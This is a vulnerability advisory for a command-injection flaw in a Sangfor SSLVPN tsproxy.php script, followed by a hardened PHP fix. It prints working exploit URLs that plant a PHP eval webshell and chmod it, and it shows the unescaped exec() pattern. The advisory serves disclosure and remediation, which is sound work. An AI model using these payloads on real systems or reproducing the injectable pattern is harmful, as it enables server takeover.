Summary: the security awareness of this programmer is far too low. Arbitrary commands can be executed through a single request parameter.

Details:

    $args = $_REQUEST['cmd'];      // attacker-controlled, never validated or escaped
    /* something here */
    exec("tsutil-proxy $ip $args", $output, $ret);   // $args is spliced straight into the shell command line

Anyone who understands PHP's exec() function sees the problem at a glance: the cmd parameter is concatenated into the shell command unescaped, so a shell metacharacter such as "|" lets the caller append any command of their choosing.

Affected version: SSLVPN M5.6 and below; the latest version was not tested.

The report's example requests (SSLVPN.SANGFOR.COM is not a real address, only an example):

http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig|echo%20'%3C?php%20eval($_POST[cmd]);?%3E'%20%3E/app/usr/sbin/webui/html/svpn.php

This executes echo '<?php eval($_POST[cmd]);?>' > /app/usr/sbin/webui/html/svpn.php, generating a one-line webshell.

http://SSLVPN.SANGFOR.COM:1000/cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig|chmod 777 /app/usr/sbin/webui/html/svpn.php

This changes the permissions of svpn.php.

Proof of vulnerability:

    $args = $_REQUEST['cmd'];
    $ip = $_SERVER['REMOTE_ADDR'];
    exec("tsutil-proxy $ip $args", $output, $ret);

Solution: what else can be done but find someone to give the programmers security-programming awareness training?
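For contrast, a hardened version of the same handler, written here as an added example and not Sangfor's code: it assumes tsutil-proxy takes the client IP followed by one subcommand name, and the allowlist contents are a hypothetical placeholder.

```php
<?php
// Hardened tsproxy.php handler (example code, not the vendor's).
// Assumption: tsutil-proxy accepts "<ip> <subcommand>"; the allowlist
// below is hypothetical and would be filled with the real subcommands.
$allowedCommands = ['ifconfig', 'status'];

function buildProxyCommand(string $ip, string $cmd, array $allowed): ?string
{
    // 1. Only a syntactically valid IP is passed on. REMOTE_ADDR is set by
    //    the server, but validating it is cheap and guards against a
    //    misconfiguration that copies a client-supplied header into it.
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // 2. The command must match an allowlist entry exactly (strict compare),
    //    so "ifconfig|echo ... > file" is rejected rather than executed.
    if (!in_array($cmd, $allowed, true)) {
        return null;
    }
    // 3. Quote every argument anyway: defence in depth if the allowlist is
    //    later widened to values that could contain shell metacharacters.
    return 'tsutil-proxy ' . escapeshellarg($ip) . ' ' . escapeshellarg($cmd);
}

// Read from $_GET only; $_REQUEST also merges POST and cookie data.
$cmd = isset($_GET['cmd']) ? (string) $_GET['cmd'] : '';
$ip  = $_SERVER['REMOTE_ADDR'] ?? '';

$command = buildProxyCommand($ip, $cmd, $allowedCommands);
if ($command === null) {
    // Log and reject: a rejected request here is a detection signal worth
    // keeping, since legitimate clients only ever send allowlisted values.
    error_log("tsproxy: rejected cmd=" . var_export($cmd, true) . " from $ip");
    http_response_code(400);
    exit('invalid request');
}

exec($command, $output, $ret);
header('Content-Type: text/plain');
echo implode("\n", $output), "\n";
```

Besides the code fix, the one-line shell in the report was only possible because the web server's user could write to the webui document root; making that directory read-only for the PHP process would have limited the impact of the injection.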